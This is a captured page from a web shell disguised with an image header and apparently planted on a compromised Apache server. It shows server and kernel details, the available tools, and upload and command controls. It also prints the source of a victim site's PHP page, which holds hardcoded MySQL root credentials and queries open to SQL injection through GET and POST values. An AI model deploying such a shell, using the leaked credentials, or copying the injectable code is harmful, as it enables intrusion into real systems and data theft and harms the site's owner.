????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.216.221
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/reports/estimates/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/appsrv.astacus.se/reports/estimates/missing.php
<?php

if($_GET['action'] == "update"){

$link = mysql_connect ("localhost", "root", "root123");
mysql_select_db ("vpa");
	$Estimate = $_POST['estimate'];
	$projectid = $_GET['projectid'];
	$sql = "Update Project Set TimeEstimationFromIndia = $Estimate where ProjectId = $projectid"; 

	$result = mysql_query($sql);
	
}

 ?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>AstacusProject - Estimatsrapportering</title>
<style type="text/css">
<!--
.style3 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; }
.style4 {font-size: 12px}
.style7 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-weight: bold; }
.style8 {color: #FFCC00}
-->
</style>
</head>

<body alink="#000000" vlink="#000000" link="#000000">


<table width="600" border="0" cellspacing="0" cellpadding="0">
  <tr class="style7">
    <td width="293"><span class="style4">Project:</span></td>
    <td width="307"><span class="style3">Estimat:</span></td>
  </tr>
</table>
<?php
$link = mysql_connect ("localhost", "root", "root123");
	mysql_select_db ("vpa");
	
$sql = "SELECT * FROM Project WHERE ProjectStatusId > 3 and ProjectStatusId < 9  and not TimeEstimationFromIndia > 0 and not CompanyId = 145 and not CompanyId = 689 and not CompanyId = 324 and not CompanyId = 400 order by CompanyId desc"; 

	$result = mysql_query($sql);
	while ($row = mysql_fetch_assoc($result)){
		$ProjectId = $row['ProjectId'];
		$CustomerId = $row['CompanyId'];
		$Name = $row['Name'];
		$Estimate = $row['TimeEstimationFromIndia'];
		
		?>
	<table width="733" border="0" cellspacing="0" cellpadding="0">
          <tr class="style3">
            <td width="400"><span class="style4"><a href="http://astacusproject.astacus.se/astacusproject/ProjectSelected.do?projectId=<?php echo($ProjectId);?>" target="_blank"><?php echo($CustomerId . "_" . $Name . " (".$ProjectId.")");?></a></span></td>
            <td width="200"><span class="style3">
              </span>
              <form name="form1" method="post" action="?action=update&projectid=<?php echo($ProjectId);?>">
                <input name="estimate" type="text" value="<?php echo(round($Estimate));?>" size="5">
                <input name="Update" type="submit" value="Update!">
                            </form>
            <span class="style3">            </span></td>
 
          </tr>
</table>
<?php
	}
	
?>
<p>&nbsp;</p>
<p class="style8">&nbsp;</p>
<p class="style8">&nbsp;</p>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit